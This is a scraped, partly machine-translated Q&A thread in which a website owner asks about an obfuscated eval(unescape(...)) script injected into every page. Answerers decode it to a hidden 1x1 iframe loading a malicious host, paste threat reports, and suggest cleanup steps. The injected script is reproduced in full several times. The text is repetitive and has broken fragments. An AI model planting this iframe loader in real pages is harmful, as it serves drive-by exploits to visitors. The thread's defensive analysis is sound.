此站点可能正在分发恶意软件？奇怪的javascript？ eval（环境景观（“%64%6F%63%75%6D%65%6E%74%2E%77%72%69% 74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74% 70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%33%38%33% 37%35%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31% 3E%3C%2F%69%66%72%61%6D%65%3E%27%29’）；_Javascript_Malware

此站点可能正在分发恶意软件？奇怪的javascript？ eval（环境景观（“%64%6F%63%75%6D%65%6E%74%2E%77%72%69% 74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74% 70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%33%38%33% 37%35%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31% 3E%3C%2F%69%66%72%61%6D%65%3E%27%29’）；

javascript

此站点可能正在分发恶意软件？奇怪的javascript？ eval（环境景观（“%64%6F%63%75%6D%65%6E%74%2E%77%72%69% 74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74% 70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%33%38%33% 37%35%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31% 3E%3C%2F%69%66%72%61%6D%65%3E%27%29’）；,javascript,malware,Javascript,Malware,我的网站www.safwanmanpower.com在每个页面上都受到恶意软件脚本的攻击我不知道这个脚本是关于什么的任何人都可以知道这个脚本如何使我的网站受到恶意软件的影响希望得到快速和积极的回应编辑 sumone如何在没有上传许可的情况下攻击我的网站？？？如果您想查看该代码的作用，请将转义代码粘贴到此URL上（我已经这么做了，它似乎正在尝试将您的网站重定向到另一个链接）：您是否在您的网站上使用某种内容管理系统（CMS）？如果是这样的话，你能做的最好的事情就是去CMS的网站下载最新版本。

我的网站www.safwanmanpower.com在每个页面上都受到恶意软件脚本的攻击我不知道这个脚本是关于什么的任何人都可以知道这个脚本如何使我的网站受到恶意软件的影响

希望得到快速和积极的回应

编辑

sumone如何在没有上传许可的情况下攻击我的网站？？？

如果您想查看该代码的作用，请将转义代码粘贴到此URL上（我已经这么做了，它似乎正在尝试将您的网站重定向到另一个链接）：

您是否在您的网站上使用某种内容管理系统（CMS）？如果是这样的话，你能做的最好的事情就是去CMS的网站下载最新版本。

在chrome上，这会转移到

“document.wri%74e（“未转移的代码是这样的：
<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%
74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%
70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%33%38%33%
37%35%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%
3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script>

document.wri%74e（“删除它解码到的空白时：
document.wri% 74e('<iframe src="htt% 70://sedpoo.com/?3383% 375" width=1 height=1% 3E</iframe>')

document.write（“”）
未替换的代码是：
document.write('<iframe src="http://sedpoo.com/?338375" width=1 height=1></iframe>')

document.write（“”）

它正在创建一个iFrame，我假设它将生成用于广告等的弹出窗口，并使用该工具将代码取消扫描以获取此信息
document.write（“”）

这是在你的页面中嵌入一个1px 1px（实际上是不可见的）iframe，从这里它最有可能利用漏洞攻击你的访问者，或者只是试图生成广告窗口。我将回答一个直接的问题：向每个页面注入脚本意味着黑客控制了web服务器，可能控制了整个主机web服务器场
怎么做？可能是他偷了管理员密码。可能是他在主机上工作，利用他栽种的后门。
你不能真正知道，如果你是主持人，你也不能真正保护自己，因为这是主持人的责任
如果您是托管的，请查找其他更可靠的主机。否则，请按照Cfreak的评论操作，并更改服务器上的所有密码，安装新的强大防火墙等
编辑：如果服务器是您的（即，您不使用第三方主机），请检查安全事件日志，并查看谁在感染期间登录。显然，请运行完整的病毒/恶意软件扫描。
您的站点已被已知实体破坏。您的页面现在正在为您的访问者提供漏洞攻击，并使他们面临风险
立即关闭您的站点并参考：
威胁报告
发现的威胁总数：4
驾车下载（这是什么？）
发现的威胁：3
以下是完整列表：（有关特定威胁的更多信息，请单击
在下面的威胁名称上）
威胁名称：HTTP恶意工具包变体活动15
地点：http://sedpoo.com/?687328
威胁名称：HTTP恶意工具包变体活动15
地点：http://sedpoo.com/?-560137484
威胁名称：HTTP恶意工具包变体活动15
地点：http://sedpoo.com/?2443640
病毒（这是什么？）
发现的威胁：1
以下是完整列表：（有关特定威胁的更多信息，请单击
在下面的威胁名称上）
威胁名称：特洛伊木马.Gen
地点：http://sedpoo.com/des.jar
以及：
sedpoo.com目前的上市状态如何？
网站被列为可疑网站-访问此网站可能会损坏您的计算机。
谷歌访问这个网站时发生了什么？
在过去90天里，我们在网站上测试了1887页，其中0页
导致在没有用户的情况下下载和安装恶意软件
同意。谷歌上一次访问该网站是在2011年1月18日，而
上一次在该网站上发现可疑内容是在2011年1月18日。
恶意软件包括2478次攻击、2135次特洛伊木马、1508次脚本
利用漏洞。
该网站托管在8个网络上，包括AS4766（韩国电信），
AS51306（UAIP），AS5610（捷克）。
本网站是否作为中介，导致进一步的分销
恶意软件？
在过去的90天里，sedpoo.com似乎起到了中介作用
对于962个站点的感染，包括feja-islame.com/、yaris-club.net/，
cstbilisi.ge/。
此网站是否承载恶意软件？
是的，在过去的90天里，这个网站已经托管了恶意软件。它
受感染的2519个域名，包括yaris-club.net/、feja-islame.com/，
bhiee.net/。
这是怎么发生的？
在某些情况下，第三方可以向合法站点添加恶意代码，
这会导致我们显示警告信息。
我不会访问sedpoo攻击站点，除非您进一步研究了威胁并准备好应对可能发生的潜在感染。启动虚拟机访问该站点是进一步调查的一种快速方法，而不会对您的工作站和数据造成危害。
以下是未使用的JavaScript代码：
What is the current listing status for sedpoo.com?
Site is listed as suspicious - visiting this web site may harm your computer.

What happened when Google visited this site?
Of the 1887 pages we tested on the site over the past 90 days, 0 page(s)
 resulted in malicious software being downloaded and installed without user 
consent. The last time Google visited this site was on 2011-01-18, and the 
last time suspicious content was found on this site was on 2011-01-18.
Malicious software includes 2478 exploit(s), 2135 trojan(s), 1508 scripting 
exploit(s).

This site was hosted on 8 network(s) including AS4766 (Korea Telecom), 
AS51306 (UAIP), AS5610 (CZECH).

Has this site acted as an intermediary resulting in further distribution 
of malware?
Over the past 90 days, sedpoo.com appeared to function as an intermediary 
for the infection of 962 site(s) including feja-islame.com/, yaris-club.net/, 
cstbilisi.ge/.

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It 
infected 2519 domain(s), including yaris-club.net/, feja-islame.com/, 
bhiee.net/.

How did this happen?
In some cases, third parties can add malicious code to legitimate sites, 
which would cause us to show the warning message.
document.write（“”）
您应该使用smscanner
（简单服务器恶意软件扫描器），该扫描器将扫描受感染的文件、脚本、模糊的javascript代码、外壳等。到目前为止，它可以在linux web服务器上工作
更多信息
1.让你的网站离线，这样它就不会传播。2.回到这里，告诉我们你的网站和你的服务器正在运行什么软件，这样我们就可以帮助你删除它。我已经删除了代码，现在正处于谷歌网站管理员工具的审查阶段，我相信他们会删除受恶意软件影响的标签，但有人如何攻击我的网站ebsite这是一个问题？可能是通过一个不逃避javascript的输入表单（比如评论功能）。您在站点的哪个部分找到了这个脚本？代码看起来像document.write（“”）。臭名昭著的1px by 1px iframe技术。或者在您使用的任何浏览器中打开开发控制台，然后自己将其取消浏览。@Matt-在Chrome中如何做到这一点？@m.edmondson:点击ctrl-shift-j将javascript控制台打开
Threat Report
Total threats found: 4

Drive-By Downloads (what's this?)
Threats found: 3
Here is a complete list: (for more information about a specific threat, click
 on the Threat Name below)
Threat Name:     HTTP Malicious Toolkit Variant Activity 15
Location:    http://sedpoo.com/?687328


Threat Name:     HTTP Malicious Toolkit Variant Activity 15
Location:    http://sedpoo.com/?-560137484


Threat Name:     HTTP Malicious Toolkit Variant Activity 15
Location:    http://sedpoo.com/?2443640

Viruses (what's this?)
Threats found: 1
Here is a complete list: (for more information about a specific threat, click
 on the Threat Name below)
Threat Name:    Trojan.Gen
Location:    http://sedpoo.com/des.jar
What is the current listing status for sedpoo.com?
Site is listed as suspicious - visiting this web site may harm your computer.

What happened when Google visited this site?
Of the 1887 pages we tested on the site over the past 90 days, 0 page(s)
 resulted in malicious software being downloaded and installed without user 
consent. The last time Google visited this site was on 2011-01-18, and the 
last time suspicious content was found on this site was on 2011-01-18.
Malicious software includes 2478 exploit(s), 2135 trojan(s), 1508 scripting 
exploit(s).

This site was hosted on 8 network(s) including AS4766 (Korea Telecom), 
AS51306 (UAIP), AS5610 (CZECH).

Has this site acted as an intermediary resulting in further distribution 
of malware?
Over the past 90 days, sedpoo.com appeared to function as an intermediary 
for the infection of 962 site(s) including feja-islame.com/, yaris-club.net/, 
cstbilisi.ge/.

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It 
infected 2519 domain(s), including yaris-club.net/, feja-islame.com/, 
bhiee.net/.

How did this happen?
In some cases, third parties can add malicious code to legitimate sites, 
which would cause us to show the warning message.
document.write('<iframe src="http://sedpoo.com/?338375" width=1 height=1></iframe>')